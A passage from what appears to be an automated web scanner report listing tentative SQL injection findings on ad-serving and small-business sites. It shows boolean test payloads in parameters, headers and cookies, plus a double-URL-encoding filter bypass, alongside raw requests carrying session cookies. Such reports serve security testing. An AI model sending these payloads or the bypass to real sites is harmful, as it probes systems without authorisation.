1.5. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [pg parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://ad.doubleclick.net
Path:	/adi/N4581.811.CBSPUBLISHER/B2336781

Issue detail

The pg parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the pg parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg='%20and%201%3d1--%20&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:09:38 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5555

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/1435575/1-Promotions_0211-1231_Branding-14MillionGeek_300x250.swf";
var gif = "http://s0.2mdn.net/1435575/1-Promotions_0211-1231_Branding-14MillionGeek_300x250.jpg";
var minV = 6;
var FWH = ' width="300" height="250" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/11f/%2a/c%3B237718223%3B0-0%3B0%3B61055221%3B4307-300/250%3B40719066/40736853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg='%20and%201%3d1--%20&t=2011.04.27.21.56.00&event=58/http://www.newegg.com?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-14MillionGeeks-_-NA-_-NA");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 600;
var winH = 400;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();
sm[1] = "";
sm[2] = "";
sm[3] = "";
sm[4] = "";
sm[5] = "";

var ct=new Array();
ct[0]="";if(ct[0].substr(0,4)!="http"){ct[0]="";}
ct[1] = "";
ct[2] = "";
ct[3] = "";
ct[4] = "";
ct[5] = "";
ct[6] = "";
ct[7] = "";
ct[8] = "";
ct[9] = "";
ct[10] = "";

var fv='"clickTag='+url+'&clickTAG='+url+'&clicktag='+url+'&moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(i=1;i<ct.length;i++){if(ct[i]!=""){if(ct[i].indexOf("http")==0){x=escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/11f/%2a/c%3B237718223%3B0-0%3B0%3B61055221%3B4307-300/250%3B40719066/40736853/1%3B%3B%7Esscs%3D%
...[SNIP]...

Request 2

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg='%20and%201%3d2--%20&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:09:39 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 845

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3af6/14/11f/%2a/v;240427355;0-0;0;61055221;4307-300/250;41883579/41901366/1;;~sscs=%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg='%20and%201%3d2--%20&t=2011.04.27.21.56.00&event=58/http://promotions.newegg.com/nepro/11-1111/index.html?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-10off50-_-0426-_-0427"><img src="http://s0.2mdn.net/viewad/1435575/Promotions_0426-0427_Branding-10off50_300x250.jpg" border=0 alt="Click here to find out more!"></a></body></html>

1.6. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [pt parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://ad.doubleclick.net
Path:	/adi/N4581.811.CBSPUBLISHER/B2336781

Issue detail

The pt parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the pt parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001'%20and%201%3d1--%20&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:04:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 841

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3af6/14/11f/%2a/a;239957955;0-0;0;61055221;4307-300/250;41448515/41466302/1;;~sscs=%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001'%20and%201%3d1--%20&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://promotions.newegg.com/Gazelle/11-0737/index.html?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-1Ton-_-0401-_-0430"><img src="http://s0.2mdn.net/viewad/1435575/Promotions_0401-0430_Branding-1Ton_300x250.jpg" border=0 alt="Click here to find out more!"></a></body></html>

Request 2

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001'%20and%201%3d2--%20&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:04:46 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5555

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/1435575/1-Promotions_0211-1231_Branding-14MillionGeek_300x250.swf";
var gif = "http://s0.2mdn.net/1435575/1-Promotions_0211-1231_Branding-14MillionGeek_300x250.jpg";
var minV = 6;
var FWH = ' width="300" height="250" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/11f/%2a/n%3B239957816%3B0-0%3B0%3B61055221%3B4307-300/250%3B40719066/40736853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001'%20and%201%3d2--%20&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://www.newegg.com?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-14MillionGeeks-_-NA-_-NA");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 600;
var winH = 400;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();
sm[1] = "";
sm[2] = "";
sm[3] = "";
sm[4] = "";
sm[5] = "";

var ct=new Array();
ct[0]="";if(ct[0].substr(0,4)!="http"){ct[0]="";}
ct[1] = "";
ct[2] = "";
ct[3] = "";
ct[4] = "";
ct[5] = "";
ct[6] = "";
ct[7] = "";
ct[8] = "";
ct[9] = "";
ct[10] = "";

var fv='"clickTag='+url+'&clickTAG='+url+'&clicktag='+url+'&moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(i=1;i<ct.length;i++){if(ct[i]!=""){if(ct[i].indexOf("http")==0){x=escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/11f/%2a/n%3B239957816%3B0-0%3B0%3B61055221%3B4307-300/250%3B40719066/40736853/1%3B%3B%7Esscs%3D%
...[SNIP]...

1.7. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://ad.doubleclick.net
Path:	/adi/N4581.811.CBSPUBLISHER/B2336781

Issue detail

The sz parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the sz parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185'%20and%201%3d1--%20&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:00:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5555

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/1435575/1-Promotions_0211-1231_Branding-14MillionGeek_300x250.swf";
var gif = "http://s0.2mdn.net/1435575/1-Promotions_0211-1231_Branding-14MillionGeek_300x250.jpg";
var minV = 6;
var FWH = ' width="300" height="250" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/11f/%2a/n%3B239957816%3B0-0%3B0%3B61055221%3B4307-300/250%3B40719066/40736853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13185'%20and%201%3d1--%20&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://www.newegg.com?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-14MillionGeeks-_-NA-_-NA");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 600;
var winH = 400;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();
sm[1] = "";
sm[2] = "";
sm[3] = "";
sm[4] = "";
sm[5] = "";

var ct=new Array();
ct[0]="";if(ct[0].substr(0,4)!="http"){ct[0]="";}
ct[1] = "";
ct[2] = "";
ct[3] = "";
ct[4] = "";
ct[5] = "";
ct[6] = "";
ct[7] = "";
ct[8] = "";
ct[9] = "";
ct[10] = "";

var fv='"clickTag='+url+'&clickTAG='+url+'&clicktag='+url+'&moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(i=1;i<ct.length;i++){if(ct[i]!=""){if(ct[i].indexOf("http")==0){x=escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/11f/%2a/n%3B239957816%3B0-0%3B0%3B61055221%3B4307-300/250%3B40719066/40736853/1%3B%3B%7Esscs%3D
...[SNIP]...

Request 2

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185'%20and%201%3d2--%20&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:00:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 845

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3af6/14/11f/%2a/v;240427355;0-0;0;61055221;4307-300/250;41883579/41901366/1;;~sscs=%3fhttp://adlog.com.com/adlog/e/r=13185'%20and%201%3d2--%20&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://promotions.newegg.com/nepro/11-1111/index.html?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-10off50-_-0426-_-0427"><img src="http://s0.2mdn.net/viewad/1435575/Promotions_0426-0427_Branding-10off50_300x250.jpg" border=0 alt="Click here to find out more!"></a></body></html>

1.8. http://lanlogic.com/WebResource.axd [Referer HTTP header] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://lanlogic.com
Path:	/WebResource.axd

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /WebResource.axd?d=l3zzd57PO2cbQyZeMmo-uesSKHfMaXjXR4FLAk1eCMWA4_QTev1dY0yXo0Pp0w-Q2J8Cs81a2E8FZxNV1AgioWktUu81&t=634382930190938750 HTTP/1.1
Host: lanlogic.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q='
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=4890286.1303940671.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=4890286.1736931901.1303940671.1303940671.1303940671.1; __utmc=4890286; __utmb=4890286.1.10.1303940671; hubspotdt=2011-04-27%2017%3A44%3A22; hubspotutk=faa269c8086b43ae8177e29c33da9aeb; hubspotvd=faa269c8086b43ae8177e29c33da9aeb; hubspotvw=faa269c8086b43ae8177e29c33da9aeb; hubspotvm=faa269c8086b43ae8177e29c33da9aeb; hsfirstvisit=http%3A%2F%2Flanlogic.com%2F||2011-04-27%2017%3A44%3A22

Response 1

HTTP/1.1 404 Not Found
Date: Wed, 27 Apr 2011 21:55:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 2381

<html>
<head>
<title>The resource cannot be found.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-fami
...[SNIP]...
<!--
[HttpException]: This is an invalid webresource request.
at System.Web.Handlers.AssemblyResourceLoader.System.Web.IHttpHandler.ProcessRequest(HttpContext context)
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web
...[SNIP]...

Request 2

GET /WebResource.axd?d=l3zzd57PO2cbQyZeMmo-uesSKHfMaXjXR4FLAk1eCMWA4_QTev1dY0yXo0Pp0w-Q2J8Cs81a2E8FZxNV1AgioWktUu81&t=634382930190938750 HTTP/1.1
Host: lanlogic.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=''
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=4890286.1303940671.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=4890286.1736931901.1303940671.1303940671.1303940671.1; __utmc=4890286; __utmb=4890286.1.10.1303940671; hubspotdt=2011-04-27%2017%3A44%3A22; hubspotutk=faa269c8086b43ae8177e29c33da9aeb; hubspotvd=faa269c8086b43ae8177e29c33da9aeb; hubspotvw=faa269c8086b43ae8177e29c33da9aeb; hubspotvm=faa269c8086b43ae8177e29c33da9aeb; hsfirstvisit=http%3A%2F%2Flanlogic.com%2F||2011-04-27%2017%3A44%3A22

Response 2

HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 20794
Content-Type: application/x-javascript
Expires: Thu, 26 Apr 2012 16:30:34 GMT
Last-Modified: Wed, 13 Apr 2011 19:03:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Wed, 27 Apr 2011 21:55:22 GMT

function WebForm_PostBackOptions(eventTarget, eventArgument, validation, validationGroup, actionUrl, trackFocus, clientSubmit) {
this.eventTarget = eventTarget;
this.eventArgument = eventArg
...[SNIP]...

1.9. http://lanlogic.com/WebResource.axd [__utmb cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://lanlogic.com
Path:	/WebResource.axd

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmb cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the __utmb cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /WebResource.axd?d=vtJ_I99CG0Wtt35hxGFs-dRs5xFqeJpJT5TKft8Yl2He1BmmqyKY-p4kdUw8jLcfmaj4qtULlCj0pFQGrwsJAENxHr41&t=634382930190938750 HTTP/1.1
Host: lanlogic.com
Proxy-Connection: keep-alive
Referer: http://lanlogic.com/contact-us.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=4890286.1303940671.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hubspotdt=2011-04-27%2017%3A44%3A22; hubspotutk=faa269c8086b43ae8177e29c33da9aeb; hubspotvd=faa269c8086b43ae8177e29c33da9aeb; hubspotvw=faa269c8086b43ae8177e29c33da9aeb; hubspotvm=faa269c8086b43ae8177e29c33da9aeb; hsfirstvisit=http%3A%2F%2Flanlogic.com%2F||2011-04-27%2017%3A44%3A22; __utma=4890286.1736931901.1303940671.1303940671.1303940671.1; __utmc=4890286; __utmb=4890286.2.10.1303940671%2527

Response 1

HTTP/1.1 404 Not Found
Date: Wed, 27 Apr 2011 21:53:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 2381

<html>
<head>
<title>The resource cannot be found.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-fami
...[SNIP]...
<!--
[HttpException]: This is an invalid webresource request.
at System.Web.Handlers.AssemblyResourceLoader.System.Web.IHttpHandler.ProcessRequest(HttpContext context)
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web
...[SNIP]...

Request 2

Response 2

HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 20794
Content-Type: application/x-javascript
Expires: Thu, 26 Apr 2012 18:03:09 GMT
Last-Modified: Wed, 13 Apr 2011 19:03:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Wed, 27 Apr 2011 21:53:08 GMT

function WebForm_PostBackOptions(eventTarget, eventArgument, validation, validationGroup, actionUrl, trackFocus, clientSubmit) {
this.eventTarget = eventTarget;
this.eventArgument = eventArg
...[SNIP]...

1.10. http://mads.cbssports.com/mac-ad [ADREQ&SP parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://mads.cbssports.com
Path:	/mac-ad

Issue detail

The ADREQ&SP parameter appears to be vulnerable to SQL injection attacks. The payloads 13363790'%20or%201%3d1--%20 and 13363790'%20or%201%3d2--%20 were each submitted in the ADREQ&SP parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

